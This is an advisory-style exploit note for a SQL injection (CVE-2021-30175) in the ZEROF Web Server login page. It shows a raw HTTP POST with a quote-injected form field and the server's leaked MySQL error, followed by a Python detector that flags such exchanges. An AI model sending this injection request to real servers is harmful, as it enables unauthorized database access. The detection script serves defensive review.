
# CVE-2021-30175 ZEROF Web Server 1.0 (April 2021 version) Login Page SQL Injection Vulnerability
==EXP==

POST /HandleEvent HTTP/1.1
Host: zerof
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: */*
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 126

Ajax=1&IsEvent=1&Obj=O4F&Evt=click&this=O4F&"_fp_=_S_ID=CteTYLjmYw108029DC1&O33=%020%02%02'&O37=%020%02%02fff"&_seq_=2&_uo_=O

HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 209
Date: Wed, 07 Apr 2021 10:33:44 GMT
Server: ZEROF Web Server

try{_rsov_(O33,0);_rsov_(O37,0);}finally{alert("#42000You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''')' at line 1.");}
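
A detection-side check for the exchange above, as an added example that is not part of the original page: it flags a response that echoes a MySQL syntax error and lists the request fields carrying SQL metacharacters. The function names, the metacharacter watch list, and the reading of the text after the last %02 separator as the submitted value are assumptions.

```python
import re
from urllib.parse import unquote_plus

# MySQL syntax-error text (SQLSTATE 42000) that the server echoes to the client.
SQL_ERROR = re.compile(r"#?42000\s*You have an error in your SQL syntax", re.I)
# Assumed watch list of SQL metacharacters, used only as a triage hint.
SQL_META = re.compile(r"""['"\\;]|--|/\*""")

def split_http(raw):
    """Return (start line, body) of a raw HTTP message."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    return head.split("\n", 1)[0], body.strip()

def widget_values(body):
    """Decode form fields, keeping the text after the last 0x02 separator."""
    out = {}
    for pair in body.split("&"):
        name, sep, value = pair.partition("=")
        if sep:
            # The captured body wraps one group in literal double quotes.
            text = unquote_plus(value).rsplit("\x02", 1)[-1]
            out[name.strip('"')] = text.strip('"')
    return out

def review_exchange(request, response):
    """Report whether a reply leaks a MySQL error, and which fields look suspect."""
    start, req_body = split_http(request)
    _, resp_body = split_http(response)
    parts = start.split()
    fields = widget_values(req_body)
    return {
        "path": parts[1] if len(parts) > 1 else "",
        "sql_error_leaked": bool(SQL_ERROR.search(resp_body)),
        "suspect_fields": sorted(k for k, v in fields.items() if SQL_META.search(v)),
    }

# Sample exchange taken from the capture above, with most headers trimmed.
SAMPLE_REQUEST = """POST /HandleEvent HTTP/1.1
Host: zerof

Ajax=1&IsEvent=1&Obj=O4F&Evt=click&this=O4F&"_fp_=_S_ID=CteTYLjmYw108029DC1&O33=%020%02%02'&O37=%020%02%02fff"&_seq_=2&_uo_=O"""
SAMPLE_RESPONSE = """HTTP/1.1 200 OK
Server: ZEROF Web Server

try{_rsov_(O33,0);_rsov_(O37,0);}finally{alert("#42000You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''')' at line 1.");}"""

if __name__ == "__main__":
    print(review_exchange(SAMPLE_REQUEST, SAMPLE_RESPONSE))
```

The leaked error in the response is the authoritative signal; the field list only narrows down which input to review.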